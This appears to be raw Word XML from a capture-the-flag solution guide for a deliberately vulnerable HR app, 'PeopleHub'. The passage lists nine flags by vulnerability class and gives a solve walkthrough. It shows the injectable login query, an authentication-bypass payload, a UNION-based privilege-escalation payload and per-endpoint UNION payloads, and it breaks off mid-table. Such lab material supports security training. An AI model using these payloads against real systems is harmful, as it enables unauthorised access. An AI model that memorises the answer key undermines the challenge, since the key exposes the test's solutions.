          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>investigation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — all nine PeopleHub sub-flags true; (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the correct emergency access code. Both together unlock Stage 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>The nine investigation flags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76"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PeopleHub login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (authentication bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Directory search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_employee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Profile (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> lookup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>People Analytics → Reports (segment filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Requests search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Documents (detail/download route)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Broken object-level authorization (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_xxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Administration → Employee Data Import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XXE (external entity injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_xss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Help &amp; Support → Share Feedback with HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_emergency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security → Emergency Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Business-logic bypass (break-glass code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Full solve walkthrough (verified live)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1 — Login (blind, then targeted escalation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>SELECT u.user_id, u.username, u.role_id, u.employee_id, u.is_active, r.name AS roleName</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>FROM users u JOIN roles r ON r.role_id = u.role_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>WHERE u.username = '${username}' AND u.password_hash = '${password}' LIMIT 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Blind bypass (lands on a low-privilege account on purpose):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>username: x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">password: ' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Escalation (no prior knowledge of a specific username or ID needed):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">username: ' UNION SELECT user_id,username,role_id,employee_id,1,(SELECT name FROM roles WHERE roles.role_id=users.role_id) FROM users ORDER BY role_id DESC LIMIT 1 -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>password: x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The correlated subquery pulls the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> role name; a hardcoded placeholder would break the session’s RBAC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2–5 — UNION injections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val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5616"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Directory search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5616"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">x' UNION SELECT 'x','x','x','x','x','x','x','x','x','x','x','x','x' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Employee Profile </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5616"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">x' UNION SELECT 'x'×22 -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reports </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5616"/>
          </w:tcPr>
          <w:p>
